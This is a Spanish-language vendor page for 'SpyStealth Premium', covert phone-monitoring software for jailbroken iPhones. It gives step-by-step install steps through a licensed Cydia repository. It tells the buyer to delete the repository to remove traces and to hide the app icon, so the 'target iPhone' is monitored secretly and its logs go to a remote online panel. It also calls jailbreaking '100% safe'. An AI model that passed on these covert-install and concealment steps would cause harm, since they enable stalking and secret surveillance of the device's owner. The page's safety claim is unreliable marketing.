SPYSTEALTH PREMIUM

Descargar e Instalar SpyStealth Premium en iPhone con Jailbreak

 

​¿ Que es el Jailbreak ?

El jailbreak en su iPhone significa liberarlo de las limitaciones impuestas por la compañía de Apple. El procedimiento es sencillo, usted instala un programa en su computadora, luego lo transfiere a su iPhone donde lo libera y abre el sistema de archivos permitiendo su modificación para la instalación de aplicaciones de terceros. Un dispositivo con jailbreak todavía puede usar la App Store, iTunes y todas las demás funciones, como hacer llamadas telefónicas. El jailbreak es una forma de escalado de privilegios.

Puede realizar su jailbreak de forma 100% segura y a cualquier versión.

SpyStealth Premium


Todos los pasos de instalación a continuación mencionados, serán mostrados en su panel de control además de contar con soporte técnico 24/7 después de su Compra Aquí.


Requerimientos de Sistema Operativo: iOS 7.0 en adelante

Con este método de instalación solo puede rastrear el dispositivo iOS con jailbreak, ya que la instalación de SpyStealth Premium es a través de Cydia.

Con el fin de comprobar si su iPhone cuenta con jailbreak – revise en www.iclarified.com/jailbreak si su versión de iOS le permite instalar Cydia y busque el icono de la aplicación Cydia en la pantalla de inicio.

Usted necesitará que el dispositivo iOS esté desbloqueado y conectado al Internet, después de ello y haga lo siguiente:

1.- ​Abra Cydia desde la pantalla principal y vaya a Sources.


2.- Presione sobre Editar -> Agregue y escriba en URL del sitio web: http://repospy(-licencia*).com
​[Licencia* la obtendrá después de su compra y más información en su panel de control]


3.- Pulse sobre el repositorio de SpyStealth de la lista de Sources disponibles en Cydia, después escoja Todos los Paquetes e instale “SpyStealth”


4.- Haga clic en Instalar y Confirmar instalación del Paquete. Usted necesitará Reiniciar Sprinboard cuando sea instalada


5.- Después de instalar la aplicación usted puede borrar el repositorio de SpyStealth de Cydia, para eliminar rastros (esto no borrará la aplicación).


6.- Para terminar la configuración de SpyStealth Premium – Vaya a la Pantalla principal y pulse sobre el icono de SpyStealth. Pulse Continuar> Aceptar acuerdo de licencia “Proceder” al paso Final de la instalación.


7.- Si usted quiere Mostrar o Esconder el icono de SpyStealth

Escoja la opción necesaria.

Keep hará el icono visible

Hide mantendrá el icono oculto


8.- Escriba su código de Licencia y pulse sobre “Completar registro”.

9.- Pulse OK. Instalación finalizada.


Después de instalar SpyStealth Premium…

Quedara funcionando y monitoreando el iPhone objetivo, podrá ver los registros en su panel de control online desde una computadora o tablet desde cualquier parte del mundo.

Ver Funciones Para iPhone

EspiaDeCelulares.Com